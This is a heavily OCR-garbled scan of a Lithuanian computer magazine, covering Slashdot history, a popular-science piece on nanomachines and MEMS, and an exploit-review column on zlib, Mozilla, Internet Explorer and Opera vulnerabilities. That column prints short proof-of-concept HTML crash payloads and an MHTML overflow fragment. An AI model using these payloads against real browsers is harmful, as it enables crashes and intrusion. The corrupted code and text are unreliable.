Darašė laišką Robui Maldai. 2000 metų gegužę svetainė 
tyrė Ilgą paskirstytą DoS ataka, kuri truko tris dienas. 
pačių Metų rugsėji Slashdot vėl buvo nulaužtas. Sį kartą 
padarė du olandų hakeriai Nohican ir (). Priešingai nei 
ankstesni įsilaužėliai, jie neturėjo tikslo kaip nors pakenkti 
svetainei. | vidu jie pateko per svetainės rezervinėje 
menų bazėje paliktą skylę, nes testinėje svetainės dalyje 
Zebėjo gauti administratoriaus slaptažodį. Po to jie į Slashdot 
siuntė laišką, kuriame išsamiai aprašė įsilaužimo procedūrą ir 
etainėje surastus pažeidžiamumus. Kai pažeidžiamumai buvo 
ašalinti, CmdrTaco apie šį ivyki svetainėje išplatino pranešimą, 
pamiršdamas padėkoti hakeriams. 
tą per interviu Robo Maldos paklausė, kokia fenomenalaus 
shdot populiarumo priežastis. | tai Robas atsakė pa- 
rastai: „Svetainė atsirado su reikiama koncepcija ir reikiamu 
aiku“. Originali svetainės koncepcija, leidžianti apjungti gykų 
ndruomenę ir visus tuos, kas domisi IT pasaulio įvykiais, open 
rce koncepcija, kuri nuolat tobulinama tai Ir yra sėkmės 
tis. Slashdot bendruomenę sudarantiems žmonėms ne 
mažiau svarbi ir resurso kūrėjų bei savininkų vykdoma politika. 


Tai laisvės politika, kur kiekvienas gali išreikšti savo mintis ir 
Dendruomenės nuomonė yra kur kas aukščiau stambių | 
orporacijų Interesų. 1 | 


Marvel Charactgr 


FERRUM 


SCENA HACK IMPLANT SOFTWARE 


CODING UNIXOID 


UNITS 


Ukrainiečių mikrominiatiūri- 
ninko Siadristo galerija: 
http://www.microart.kiev.ua 
Foresight institutas ir jo mole- 
kuliniai modeliai: http://www. 
foresight.org 

ChemOffice 2006 Trial 1 — 
nepaprasta programa, kurioje 
surinkinėjamos molekulinės 
mašinos: Attp://scistore. 
cambridgesoft.com/software/ 
product.cfm?pid=4013 
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Molekulinės mašinos 


[Po mikroskopu — ne tik analizė] 

Kartą man po ranka pakliuvo knygutė apie ukrainiečių 
dėdulę miniatiūristą Nikolajų Siadristą, kuris 60-aisiais 
praėjusio amžiaus metais darė tokias miniatiūras, kokių 
nė nesapnavo daugelis šiandienos specialistų su naujau- 
sia įranga. Pažiūrėjęs į jo darbus aš radau ne tik skruzdės 
dydžio elektros variklį (ir tai buvo padaryta 60-aisiais!), 
bet ir kitų įdomių dalykų: ant žmogaus plauko užrašytus 
žodžius, pakaustytas blusas, šachmatų lentą su toki- 
omis mažomis figūrėlėmis, kad jos buvo matomos tik 
per mikroskopą. Vienas eksponatas neabejotinai privers 
nustebti visus, kas tai mato pirmą kartą: į išgręžtą (!) 
žmogaus plauką įkeltas rožės muliažas. 

Kaip savo knygelėje pasakoja šis dėdulė, iki šiol jis neturi 
geresnių įrankių, nei adatėlių rinkinys ir paprastas optinis 
mikroskopas, o visus kitus reikiamus įrankius jis pasidarė 
tomis pačiomis adatėlėmis. Staiga man šovė mintis: 
kodėl dar tada neatsirado nago dydžio vaizdo kamerų, 
tų pačių mobiliųjų telefonų arba musės dydžio robotų? 
Arba kodėl niekas nesukūrė įvairių implantų ir neprigrūdo 
jų į savo organizmą?! Tiesa, tada dar buvo neaišku, kam 
juos kišti į savo organizmą, tačiau kūno perdarymo idėjos 
jau pleveno ore. Veikiausiai visos įmanomos žvalgybos 


žinojo apie dėdulės pasiekimus, tačiau niekas nesugebėjo viso to 
panaudoti savo labui. 

Keista, juk su tokiu įdirbiu buvo galima šnipinėti visus ir 
kiekvieną atskirai. Vis dėlto kažkas nesusiklostė ir dėdulei liko 
tik Kijeve eksponuojama paroda. Mokslininkų susidomėjimas 
įvairiais mikroskopiniais dalykėliais atsirado vos tik išradus 
paprasčiausią optinį mikroskopą. Tada blusų kaustymas buvo 
sunkus ir kruopštus darbas, o atsiradus skenuojančiam tuneliniam 
mikroskopui prasidėjo tikras blusų bumas. Skenuojantis tunelinis 
mikroskopas — tai vakuuminė kamera, kurioje mažas čiuptuvas 
juda išilgai plokštės su pavyzdžiu. Beje, pavyzdys būtinai turi būti 
laidus elektrai. Tarp padėkliuko ir čiuptuvo sukuriamas potencialų 
skirtumas, per vakuumą tarp jų prateka tunelinė srovė, kurios 
reikšmė išmatuojama, skaitmenizuojama ir išvedama į ekraną. 
Finale gaunamas mikroreljefo vaizdas, ant kurio galima matyti 
netgi atskiras molekules ir atomus. 

Vis dėlto dirbti su tokiu įrenginiu sudėtinga, kadangi ne visi daiktai 
pasaulyje yra laidūs elektrai. Pavyzdžiui, biologiniai objektai -— DNR, 
virusai, bakterijos, baltymai ir kita — jos nepraleidžia. Siems atve- 
jams naudojamas atominės jėgos mikroskopas. 

Jis tiesiogine žodžio prasme „apčiuopia“ paviršių, o virš jo šviečia 
lazeris ir pagal spindulio nuokrypį sudaro trimatį paviršiaus reljefo 
vaizdą. Vis dėlto čia tenka susidurti su nemalonia aplinkybe: 


/1/ molekulinis guolis 


mikropasaulyje kur kas lengviau kažką įžiūrėti, nei padaryti. Štai 
todėl elektroninių blusų sukūrimas ir jų pakaustymas reikalauja 
milžiniško darbo. 

Taip ir gaunasi, kad iki atsirandant fotolitografijai, kurią panau- 
dojant šiandien kuriami praktiškai visi mikromechanizmai, dėdulė 
Siadristas neturėjo ir negalėjo turėti konkurentų. Juk kam reikalinga 
superminiatiūrinė kamera arba vienetinis variklio egzempliorius, 
kurio vieną detalę reikia gaminti trejus metus? Savaime supran- 
tama, niekam, 


(Atsarginės dalys iš „atominio LEGO“| 

Bet koks įrenginys, išskyrus šauktą, šakutę ar svarstį, susideda iš 
atskirų dalių. Tai — aksioma. Taigi net ir pats paprasčiausias ele- 
ktromechaninis eritrocito dydžio robotas turi susidėti iš daugybės 
įvairiausių detalių. Norint į robotą įdiegti ir smegenis, ir manipulia- 
torius, ir net paprastutę navigacijos sistemą, reikės kaip reikiant 
pasistengti. Konkrečiau šnekant: Konstruojant detales iš pradžių 
reikia sukurti atominį brėžinį, pagal kurį ateityje bus surenkamos 
atskiros robotų dalys, kadangi visos jos bus padarytos atomų 
tikslumu. 

Dabar šiuo ganėtinai gudriu mokslu užsiima ištisa molekulinės 
chemijos ir nanotechnologijų kryptis. Ji vadinasi „matematinis 
nanostruktūrų ir nanosistemų modeliavimas“. Paprasčiau šnekant, 
mokslininkai specialiose programose piešia iš atskirų atomų 
susidedančias guolių, variklių, manipuliatorių ir kompiuterių 
detales. Programos pačios patikrina, ar šios atitinką originalą ir 
nupiešia gautą modelį, t.y. parodo, kaip atrodys viena ar kita detalė 
po atominės jėgos arba elektroniniu mikroskopu. Šis darbas labai 
nuobodus ir ilgas. Kai kurios atsarginės dalys susideda iš keleto 
tūkstančių atomų, kiekvieną kurių reikia įkelti į jam skirtą vietą. Tuo 
pačiu negalima pamiršti Mendelejevo lentelės: atomai vienas su 
kitu gali susijungti iki tam tikro kiekio. Pavyzdžiui, anglies valentingu- 
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mas organikoje yra 4. Tai reiškia, kad prie jo elementariu cheminiu 
kovalentiniu ryšiu galima „prikabinti“ tik 4 kitus atomus. 

Net ir paties paprasčiausio guolio konstravimas — ta pati dėlionė. 
Net jeigu atomus ir sudėliosi taip, kaip tai mums liepė daryti di- 
dysis Mendelejevas, tai su programa patikrinus modelio tikrumą 
gali paaiškėti, kad realybėje detalė bus kitos formos! Ta prasme, 
įsivaizduok, kad mes darėme apvalų guolį, 0 jis staiga pradeda 
keistis ir pavirsta į ką nors beformiško. Tokius „stebuklus“ lemia 
tai, jog bet kuri atominė struktūra erdvėje įgauna tokią formą, kuri 
minimizuoja savo paviršiaus energiją. Taip Ir gaunasi, kad visą 
dieną renki guolį arba paprasčiausią veržię, 0 ji ima ir deformuo- 
jasi. Tačiau nepaisant šių sunkumų jau sukurtas įspūdingas įvairių 
molekulinių mašinų katalogas. Iš pirmo žvilgsnio šis užsiėmimas 
atrodo beprasmis: kam skaičiuoti ir kurti tokias struktūras, kurių kol 
kas neimanoma pagaminti? Tokių tyrimų vystymosi istorija parodė, 
kad atsiradus reikiamiems įrankiams daug laiko išeikvojama darbui 
su prototipais. Taigi kurti iš principo veikiančias schemas reikia jau 
šiandien, kad po 10 metų netektų gaišti laiko visokiems eksperimen- 
tams, o būtų galima iš karto griebti storą dalių katalogą ir sukurpti, 
pavyzdžiui, nanokompiuterį arba paprastesnį nanorobotą. 
Paimkime, pavyzdžiui, paprastą modelį — įprastinį guolį, kuris nau- 
dojamas įvairiausiuose mechanizmuose. Nanoguolis skiriasi nuo 
įprastinio tuo, kad jis susideda tik iš dviejų dalių: vidinės ir išorinės. Čia 
tu nepamatysi gražių rutuliukų, su kuriais žaidei vaikystėje — atomų 
trinties jėga tokia maža, kad guolis pats suksis net ir nuo šiluminio 
molekulių judėjimo kambario temperatūroje! Taip jau išeina, kad 
„atominiame LEGO“ yra tik keletas panaudojamų atomų rūšių, 0 
ne visa Mendelejevo lentelė. Iš jų labiausiai paplitusios yra šios: 
anglis, vandenilis, deguonis, siera, azotas, fosforas ir kai kurie 
metalai. Su specialia programa RazMol tu gali peržiūrėti visus šiuos 
modelius, pavartyti juos 3D erdvėje ir net sukurti savus, jeigu tik 
parsisiųsi bandomąją ChemOffice 2006 paketo versiją. Štai dar 
vienas sudėtingesnis įrenginys: molekulinis siurblys, kuris pumpuoja 
tik dujinį neoną. Jis sukurtas mėsos malimo mašinėlės principu: tu 


/2/ planetinis reduktorius 
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/3/ nanomanipuliatorius — mikromašinoms labai svarbus įrenginys 


gali pamatyti vidinį rotorių su specialiai parinktais atstumais tarp 
spiralių, kurios kaip tik atitinka neono molekulės dydį. Taip išeina, 
kad nesvarbu, kur tu įkelsi tokį siurblį, jis pumpuos tik tam tikro 
tipo molekules. 

Taip pat yra ir planetiniai reduktoriai, kurių net neįmanoma 
įsivaizduoti kaip modelių: juos sudarančių atomų skaičius gali 
siekti keletą tūkstančių. Vis dėlto pats kiečiausias ir reikalingiausias 
šios srities įrenginys, be jokios abejonės, yra roboto rankos tipo 
nanomanipuliatorius. Labai didelis vargas laukia tų, kurie ruošiasi 
surinkinėti pirmąjį veikiantį įrenginį. Tai reikės daryti praktiškai 
rankiniu būdu, todėl norint pagaminti surinktuvą bus reikalingas 
kitas surinktuvas, o jo dar niekas nepagamino :). 


[Pirmieji žingsniai — MEMS] 

Pirmieji žingsniai šia linkme jau padaryti, jie vadinasi MEMS, t.y. 
mikroelektromechaninės sistemos. Jos gaminamos jau 25 me- 
tus — nuo to laiko, vos tik pakankamai išsivystė fotolitografijos 


technologija, kurią panaudojant šiandien gaminami procesoriai. 
Kad tu nemanytum, jog blusų kaustymas — tuščias ir dėmesio 
nevertas reikalas, paaiškinu: daugiafunkcinių MEMS sistemų rinka 
per praėjusius metus siekė 68 milijardus dolerių (Network of Ex- 
cellence in Multifunctional Microsytems (NEXUS) duomenimis) ir 
toliau auga. Žinoma, norint padaryti kažką rimto ir iš to gauti pelną, 
reikia paprakaituoti (o kur nereikia?). 

Savaime suprantama, pirmieji, kurie kažką pradėjo daryti su MEMS, 
buvo kariškiai. Galima sakyti, kad jų globojamos MEMS gana greitai 
plėtojasi ir yra plačiai taikomos karinėje technikoje. Pavyzdžiui, visos 
šiuolaikinės navigacijos sistemos veikia MEMS pagrįstų inercinių 
matavimo įrenginių dėka: navigacinį bloką sudaro su GPS susieta 
sistema iš trijų giroskopų ir trijų MEMS akselerometrų. MEMS 
sensoriai taip pat naudojami bet kokiomis oro sąlygomis stebėjimo 
ir nurodytos teritorijos saugojimo nuo įsiskverbimo sistemose. 
Anksčiau sukurta distancinių sensorių sistema /mproved Remote 
Battlefield Sensor System (IREMBASS) buvo brangi ir stambi. 


/4/ blusos supimas 


Kompanija L-3 Communications Inc. sukūrė REMBASS II sistemą, 
kurioje MEMS buvo panaudota sensorių gabaritams sumažinti. 
Įžymusis nepilotuojamas skraidantis aparatas Global Hawk veikia 
valdomas sistemos su MEMS aksėlerometrais. Įvairių elektroninių 
įrenginių kūrime besispecializuojanti kompanija Crossbow parduoda 
navigacijos sistemą NAV420, kuri leidžia per atstumą valdyti 
praktiškai bet kokią karinę techniką. Ši navigacijos sistema jau 
naudojama valdant nepilotuojamus lėktuvus Global Hawk, naujose 
Hummer tipo mašinose bei bandomuosiuose jūrinių žvalgybinių 
laivų pavyzdžiuose, Ypatingai daug gerų atsiliepimų apie naviga- 
toriaus darbą gaunama blogu oru ir per audras, kuomet pilotui 
sunku nutupdyti lėktuvą ant lėktuvnešio. Įmontuotas GPS perduoda 
tikslias koordinates, greitį ir aukštį tos mašinos, kurioje jis įdiegtas. 
Visa tai įmanoma dėl MEMS sensorių, kurie navigacijos sistemose 
atlieka labai svarbų vaidmenį. 

Be sensorių MEMS didžiąja dalimi taip pat sudaro įvairūs motoriu- 
kai, jungikliai, Kkrumpliaračiai ir kiti dalykėliai. 

MEMS gaminančios kompanijos dažnai užsiima reklaminiais triukais. 
Tarkim, mes mokame pakaustyti blusą. O ar mes pajėgūs tą pačią blusą 
pasupti ant karuselės? Norėdama atkreipti į save dėmesį, stambiau- 
sia MEMS kūrimo ir gamybos kompanija MEMX laboratorija sukurpė 
sistemą su krumpliaračiais ir centre esančiu disku. Visa ši mechanika 
sukosi pakankamai smagiai, 0 tuomet kažkoks kvaištelėjęs žmogelis 
pasiūlė prigaudyti erkių, pasodinti jas ant šių diskų ir pasupti. 
Pasakyta — padaryta. Tais metais (kalbama apie 1996 me- 
tus) šis pasiekimas buvo ne tik reklaminis triukas, bet ir firmos 
galimybių demonstracija. Ar reikia sakyti, kad pademonstravus šį 
atrakcioną padaugėjo firmos klientų? Tačiau visa tai vyko tolimais 
devyniasdešimtaisiais. O šiandien vietoje MEMS sėkmingai nau- 
dojamos NEMS — nanoelektromechaninės sistemos. Jau sukurti 
greitai veikiantys NEMS akselerometrai bus naudojami būsimos 
kartos karinėje ekipuotėje, kur jie kulkos smūgį į apsauginę 
liemenę detektuos taip greitai, kad suspėtų įsijungti išorinis 
kostiumo egzoskeletas. Karines mašinas planuojama nudažyti 
specialiais „elektromechaniniais dažais“, kurie joms leistų keisti 
spalvas panašiai kaip chameleonui, taip pat užkirsti kelią korozijai 
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ir „užgydyti“ menkus pažeidimus ant mašinos korpuso. „Dažai“ 
bus sudaryti iš daugybės nanomechanizmų, kurie ir atlikinės visas 
aukščiau išvardintas funkcijas. O panaudojant optinių matricų 
sistemas, kurios bus atskiros „dažuose“ veikiančios nanomašinos, 
tyrinėtojai nori pasiekti mašinos arba lėktuvo nematomumo 
efekto. Miniatiūrinės kameros nuskaitys vaizdą vienoje įrenginio 
pusėje ir perduos jį į fotoelementus kitoje, taip mašinos priekyje 
susiformuos už jos esantis vaizdas. Žavu, tiesa? Pirmieji prototipo 
bandymai jau atliekami! Panaudojimas kovos laukė planuojamas 
2009 metais. 


[Nanobagiai] 

Leistis žemyn dydžių laiptais labai sunku. Praėjusiais metais 
mokslininkai iš Raiso universiteto pasiekė persilaužimo nanomechan- 
ikoje. Jie sintezavo mažiausią pasaulyje judančią nanomašiną, 
kuri važinėja kaip tikras automobilis. Daugelis rimtų mokslininkų Ir 
tyrinėtojų, kurie buvo susipažinę su šiuolaikinių nanotechnologijų 
ir NEMS būkle, iš pradžių tuo netikėjo. Juk iki šiol mokslininkams 
nepavykdavo padaryti ko nors sudėtingo. O čia — iš vienos molekulės 
susidedantis 4 nanometrų dydžio lengvasis automobilis! Juk 4 na- 
nometrai — tai tokia atkarpa, kurioje galima į eilę sustatyti apie 40 
vandenilio atomų, ir tai vos truputį daugiau, nėi DNR plotis! Tačiau 
tai tiesa. Mokslininkų vadovas Džeimsas M. Turas sugebėjo įrodyti 
savo atradimą — po elektroniniu mikroskopu pastatyti važinėjantys 
bagiai buvo pateikti bet kurio norinčiojo apžiūrai. 

O automobilis — tai didelė molekulė-nanosistema, susidedanti iš 
trijų šimtų atomų. Į automobilį ji panaši tik dėl savo keturių „ratų“ ir 
judėjimo būdo. Vietoje ratų šis automobilis naudoja C60 molekules, 
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kurios panašios į futbolo kamuolį ir kurios su mašinos „karkasu“ 
susiję cheminiais ryšiais. Nanomašinos sintezė ir testavimas padės 
žymiai paspartinti tokių sudėtingų struktūrų, kaip nanofabrikai arba 
nanorobotai, gamybą, naudojant metodą „iš viršaus į apačią“. O 
tai savo ruožtu reiškia praktinį mikroskopinių mašinų panaudojimą 
tavo gyvenime. 

Šiaip tai dirbtinius tokio mažo dydžio iš pažiūros automobilius 
primenančius objektus jau buvo sintezavę chemikai. Tačiau šis 
automobilis yra pirmas veikiantis įrenginys: jis paviršiumi juda taip 
pat, kaip ir normalaus dydžio automobiliai. Tyrinėtojai sugalvojo 
originalų būdą, kaip priversti nanomašiną judėti: jie ją įkaitino iki 
200“C, kas privertė suktis su mašinos rėmu cheminiais ryšiais susi- 
jusius „ratus“. Dėl keturių molekulių sukimosi lengvasis automobilis 
pradėjo judėti ir sugebėjo važiuoti plokščiu auksiniu paviršiumi. 
Norėdami įsitikinti tuo, kad automobilis iš tiesų važiuoja, 0 ne slysta, 
ir jos judėjimas sąlygotas ratų sukimosi, mokslininkai poligoną 
su mašinytėmis pakišo po skenuojančiu tuneliniu mikroskopu. 
Kiekvieną minutę mokslininkai gaudavo mašinų nuotraukas, kurios 
įrodė, kad ratai iš tiesų sukasi, todėl mašina gali važiuoti! 

Dar daugiau, nanomašiną galima užkabinti su mikroskopo zondu 
(kaip su kranu) ir perkelti iš vienos vietos į kitą. Natūralu, kad ji 
lengviau susijungia su zondu, kai griebimas atliekamas mašinos 
judėjimo kryptimi (patikrinta mokslininkų). 

Mokslininkų grupė aštuonerius metus tobulino nanomašinų 
gamybos techniką, ir štai pagaliau jų bandymus vainikavo sėkmė. 
Pavyko surasti paladžio katalizatorių nesuderinamumo prob- 
lemos sprendimą, leidusį mašinos „rėmą“ surinkti su ratų C60 
molekulėmis, kurios stabdo molekulės sintezę. Šis sunkumas buvo 
įveiktas naudojant bandymų ir klaidų metodą. 

Mokslininkai įsitikinę: mašina gali skirtingomis kryptimis pervežti 
molekulinius krovinius, kas gali būti panaudota nanokonveje- 
riuose, nanofabrikuose ir kitose sudėtingose nanosistemose. 
Taip pat ji gali būti skirtingų mobilių nanosistemų (nanorobotų, 
nanomanipuliatorių) platforma. Įsivaizduok: prie jos pritvirtinę 
nanomanipuliatorių, mes gauname mobilią darbo stotį! 
Tyrinėtojai vietoje aplinkos, kurioje yra mašinos, kaitinimo kaip 
energijos šaltinį nori panaudoti distancines baterijas (nukreiptus 
fotonų pluoštus). Taip atsiras galimybė jas valdyti per atstumą ir 
ypač tiksliai koordinuoti jų judėjimą. 


[Princo Čarlzo košmarai] 
Be jokios abejonės, bagiai — geras dalykas, tačiau kas bus, jeigu 
vienas protingas gudrutis prie mašinos su molekuliniu manipuliato- 
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riumi primontuos dar ir silpnutį kompiuterį, kuris gali vykdyti vieną 
vienintelę programą: iš aplink esančių atomų surinkinėti tokias 
pat mašinėles? O tada įsivaizduok, kad jos išplis ir po dosniais bei 
naudingais saulės spinduliais pradės be perstojo štampuoti savo 
kopijas, kol viskas aplinkui nepavirs automonstrais? „Agresoriams 
atsakysime pirmieji! pasakė princas Čarlzas. Neleisime 
mechaninėms išperoms išardyti mūsų į atskiras molekules! Ir dabar 
bent jau Jungtinėje Karalystėje šie išperos nelies vietinių, juk kas 
gali būti baisiau už piktą princą Čarlzą? Vietiniams mokslininkams 
tai labai nepatiko, todėl jie slaptai pradėjo pogrindyje virti 
mechaninę žaliavą, su kuria paskui nesusidoros. Štai kokios tos, 
naujojo amžiaus pasakos. O galbūt dar tai tik būsimos istorijos? 
Likite su mumis. 


MEMS IBM „Daugiakojis“. „Daugiakojis“ tai „gryna“ 
skaitmeninė technologija. Jo darbo principą galima palyginti 
su senų plokštelių veikimu, kuriose nuskaitanti vibruojanti 
adata sliuogė per informaciją sauganti griovelį, o „Daugiakojis“ 
turi daugybę kantileverių, čiuožiančių duomenų saugojimo 
paviršiumi, kuriame yra 1 ir O koduojantys pagilinimai. Taip 
kantileverių nukrypimas nuo vidutinės padėties transformuo- 
jamas į O ir 1 rinkinį. 

Nanotechnologijų dėka mikroschema pagaminta naudojant 
10 nanometrų technologinį procesą, leidžiantį ant organinės 
juostelės, kuri čia atlieka informacijos kaupiklio vaidmenį, 
įkurdinti 10 nanometrų skersmens pagilinimus. Atstumas tarp 
pagilinimų siekia 100 nanometrų, kas į mikroschema leido 
įkielti ganėtinai didelę atominės jėgos kantileverių matricą. 
Pagilinimas atitinka loginį „1“, 0 jo nebuvimas loginį „O“. 
Kantileveris — tai specialus atominės jėgos zondas, kuris 
„apčiupinėja“ skenuojamą paviršių, pakeisdamas savo padėtį 
erdvėje priklausomai nuo to, ar pakeliui bus sutiktas pag- 
ilinimas, ar ne. Nuskaitant duomenis specialus silicio „stalo“ 
įrenginys, ant kurio patalpinta juostelė su duomenimis, ją 
perkelia plokštumoje pagal nurodytas koordinates X ir Y. O 
multipleksoriaus įrenginys leidžia valdyti kiekviena individualų 
kantileverį, taip užtikrinant atminties adresaciją. Tuo pačiu 
kantileverių matrica užtikrina lygiagretų duomenų skaitymą/ 
rašymą. „Daugiakojis“ galės sutalpinti iki 100 Gb duomenų, o 
jo dydis bus kaip įprastinių SD kortelių. Minimali „Daugiakojo“ 
talpa sieks 10 Gb. Kaip sako IBM, ši revoliucinga technologija 
rinką užkariaus 2007 metais. 
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IEGK! « "1 r E TTYCE 
ESKOK PARDAVIMO VIETOSE į 


VISOJE LIETUVOJE! 


EKSPLOITŲ APŽVALGA 


ĮNuotolinis buferio perpildymas bibliote- 
koje „zlib“| 

Birželio 6 dieną Tavis Ormardy aptiko bibliote 
kos zlib 1.2.2 pažeidžiamumą, leidžiant 
perpildyti buferį ir atakuojamoje mašinoje 


įvykdyti laisvai pasirinktą kodą. Kontro! 
klaida padar 


yta inftrees.c byloje aprašytoje 
funkcijoje Inflate tablei), kurios esminis frag- 
mentas atrodo taip: 

check for an over-subseribėd Or Incompletė 


set of lengths 


na 
left + 1; 
for (len = 1; len MAXBITS; len+ 4 
( 
left L: left countilonį; 
I (left 0 
retum -1 Ibscribecd 


f (left > O Ad (typo CODES (codes 
countfOj > 1) 


retum 1; 


Incomplete sel 


Pataisytas variantas atrodo taip: 
check for an over-subseribed or incompiete 


sel Of lengths 


left 1 

for ilen = 1; len MAXBITS; len+ +) 
left « 1; left couWilenį; 
M ileft < O) 


retum -1 


oversubscnbed 


f (left > O 44 (type CODES me 


Tax 
!= 10) 
retum - 1; 
Incomplete set 
Nors man nepavyko surasti veikiančio 


DIto, aukščiau pateiktos informacijos visai 


pakė Iš 


ka, kad ji sukurtų bet koks protinges: 
hakens 

Tai vkra katastrofa! Zlib biblioteką naudoja 
daug programų, | kurtas ji |kompiliuota 


tiek dinamiškai, tiek Ir statiškai. Tai reiškia, 


kad nonnt pašalinti pažeidžiamumą, atnau 
ti ziib1.dll/libz.so aiškiai nepakaks ir prireiks 
perkompiliuoti visą su 2hib statiškai sulinkintą 


programinę įranga. O Jeigu kompresoriaus 


ši 


»uies tekstų fragmentai siūti“ pačioje 
programoje, tuomet tokį produktą patai- 


1 galės tk gamintojas. Pilna pažeidžiamų 


sistemų sąrašą galima adresu Www 


securitytocus.cam/bid/14162/Inlo, 0 joms 
skirtus pataisymus Čia: www. securityfocus 
conmnybid/14162/s0lutlon. Kaip ir reikėjo uikėtis. 
grėsmė iškilo praktiškai visoms platformoms 
Apple Mac OS X, Conectiva Linux, Debian 


Linux, FreeBSD Ir Lt. 


[„Mozilla firefox“, „seamonkey“, „Thunder- 
bird“: daugybė nuotolinių pažeidžiamumų] 
Iki ši0l pagrindinis motyvas naudoti ugninę lapę 


(ir 18 jos išvestas naršyklės) buvo jos saugumo 
garanuja. Kuo daugiau skylių buvo aptinkama IE 
naršyklėje, tuo mieliau vartotojai pereidavo prie 
autsaideno. Kai firefox populianimas pasiokė tam 
tikra kntinę ribą, hakeriai rimtai juo užsiėmė, po 
ko klaidos tiesiog pasipylė Ir sudrėkino ugninę 
lapės uodegą. Jeigu taip tęsis ir toliau, tai Mozilla 
(beje, šis pavadinimas šifruojamas kaip Mosaic 


Killer varikliukas, kuriuo paremtas ir IE) va- 


nkliukas ne tik pavys, bet ir aplenks šiuo metu 


labiausiai skyletą IE! 


Pastaruoju Metu Mozilla naršyklėje buvo ap- 
tikta daugybė klaidų, leidžiančių atakuojamoje 
mašinoje vykdyti laisvai pasirinkta kodą, sukelt 


JavaScript privilegijų lygį iki pat mašininio kodo 


vykdymo, paleidinėti JavaScript net Ir tuomet, kai 


jis atjungtas, nulaužti naršyklę, gauti priėjimą prie 


asmeninių vartotojo duomenų rr t.t. Vardinti visas 


klaidas būtų pernelyg vargnanus užsiėmimas, 


čia aš aptarsiu keletą jų. Hakeris, prava 
moz bug r a4, aptiko, kad per EvallnSar 
komponentą (pagrinde jis naudojamas automai 
niam proxy konfigūravimui) paleistas JavaScript 


gali ištrūkti už „smelio dėžės“ ribų Ir sukelti savo 


i60f() iškvietimu., 


prmlegijas su paprasčiausiu V 
Tai daroma kreipiantis į objektą, kuris sukurtas 


ne „smelio dėžėje r traukiant“ ji | vidų. Kitas 


klaidų ieškotojas Mikolaj J. bryn del 


neteisingo masyvų Indeksų apdorojimo aptiko 
bufeno perpildymą funkcijoje crypto.signTexti) 
Kūrėjų komanda taip pat susidūrė su sunkiai 
atkunamomis atminves problemomis, kurios 
sukelia shell kodo persiuntimo gresmę su visomis 


Iš to išplaukiančiomi 


pasekmemis. Pažeidžiam 


šie produktai: Mozilia Thunderbird 1.5.2, 


Mozilla Firefox 1.5.3, Netscape Browser 8.0.4 


beje, ankstesnes versijos nepažeidžiamos). 


alima rasti Mozi 


Proof of concept eksploitus 
Bi 


programuotojams, viešumoje šios Informacijos 


illa duomenų bazėje, kun prieinama tik 


negausi (laimo, prie komandos gali prisijungti 


praktiškai bet kuris pageidaujantysis) 


JavaScript veikia, net jeigu jis atjungtas 
ht! 
body 


frame sro “javascript:alerti„Found by 


sysdream.com 11" frame > 
body 


html > 


HTML kodas, sukeliantis programos lūžimą 
htmi 


bot 


Iframe src = "javascript:parent.document 


tei „Found by ww 


„sysdreai 


V COI 
KHrame 
body 


html > 


Išsamesnę Informacija čia: securityfocus. 


com/bid/18228, www.securityfocus.com/bid 


16770! ir w 


"516. 


ww.securityfocus.com/! 


|IE MHTML URI buferio perpildymas| 

„Microsoft“ 1 paskutiniųjų stengiasi apsaugo! 
IE ir išlaižyti naršyklės kodą, bet klaidų srautas 
nuo to nemažėja 2006 gegužės 31 dieną 
du hakeriai, Mr Niega 1 Hariharan bibliotekai 


INETCOMM.DLL priklausančioje funkcijoje meteo 


mm!CactiveUriReguost::ParseUri aptiko lokalaus 
steko bufeno perpildyma. Paskutinių IE versijų 


kodas buvo transliuojamas su Microsoft Visual 


idio „NET kompiliatoriumi su raktu /GS, kurs 


akt 


vuoja primityvią steko apsaugą Nuo perpildymo 


tai savotiška Stack-Guard atmaina, tačiau ne 
pati geriausia j0 versija). Niekada nekurianti savo 


produktų, 0 Uk „vagianti“ jau sukurtus (apie tai 


gal paskaityti straipsnyje www. softpanorama 
org/Bulietin/News 
daug naudingo), „Microsoft“ 


Archive/newsO 78.1xt ten 


kaip tai dažna 


būna, pati nesuprato, ką Ir iš ko nugvelbė, 


tiniu atžvilgiu tai reiškia, kad ištrynus siapta 
cookie, kuris yra preš gąžimo adresa, valdymas 
perduodamas nedokumentuotai Ilunkcijai inet 
comm! report gsfailure, kuri programos darbą 


IE Iužta. Bet 


perduoti valdymą sheli kodui vis delto įmanoma, 0 


Žimu. Kitaip tana 


užbaigė avanniu r 


kaip tai padaryti parodytė mano PSNY Per 
pildomi buferiai aktyvios apsaugos priemonės“ 
(elektroninę kopija rasi adresu fip:/nezumi.org 


Mub/stack -guards.zip). 
Patys ekspioitai atrodo gana paprastai: 


<html 
a href vhitml://mid:AAA. ..AAAA" example 
a> 
himi 


ĮDEFAULT| 
BASEURL 
[InternetShortout] 


URL = mhtmi;//mid:AAA...AAA 


Pastarasis kodas tai IE pribaigiančio eksploito 


5 tekstą gal rast adresu www. 


fragmentas (p 
securitytocus.con/data/vulnerabilities/exploits. 
18198.ur! 

ažeidžiamos šios IE versijos: 6.0, 6.0 SP1, 6.0 
SP2, 7.0 betal, 7 


2, taip pat įmanoma, 
kad ir ankstesnės versijos (pas manė idiegta 
6.0.2800.1106 nepažeidžiama pats tikri 


nau 


Papildomos informacijos OK ČIA; WWW. seCuri 


com/bid/18198/. 


yroci 


[Buferio perpildymas „Opera“ naršyklėje] 


Opera tai grota, patikima 1 santykinai saug 


bei tam tikru atžvilgiu kulunė naršyklė, Pavyzdžiui 


aš Opera megstu Už puikų valdymą klaviatūra, 


kuris leidžia iš viso atsisakyti pelės, o tai žymiai 
paspartina naršymą. Svarbiausia tai, kad Opera 
yra vienintelė nepriklausoma naršyklė, sukurta 
nuo nuo /r Iš paskos novelkant sunkaus praeities 


siremiant FireFox ir 


Na varikliuku 


palikimo, Mo; 


15 dar senovinės Mosaic kodo fragmentus išlaikius: 


IE vra tikri visų laikų bei tautų programuotojų 


echnologijų „lobynai“. Tok usėdė“ kodo sluok 


sniai menas su kitų sąveikauja labai sudėtingai, 
todėl klaidos išlenda tai šen, tai ten. Nauju 
savybių pridėjimas reikalauja nuodugnios viso 
10 


kodo peržiūros, kadar ĮIS įGUu seniai pi 


dideliu siūlų kamuoliu... O Opera iš pradžių buvo 


verunant visus suderinamumo 


projektuojama 
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reikalavimus), 0 tik po to programuojama, aiškia 


atskiriant Isakveno Modulio funkcijas. Toks požiūris 


supaprastina produkto derinimą ir likvauojė 
klaidų sluoksnį, tačiau, bė jokios abejones, visiškai 
klaidų 


nuo jų neapsaugo. Deja, programų 
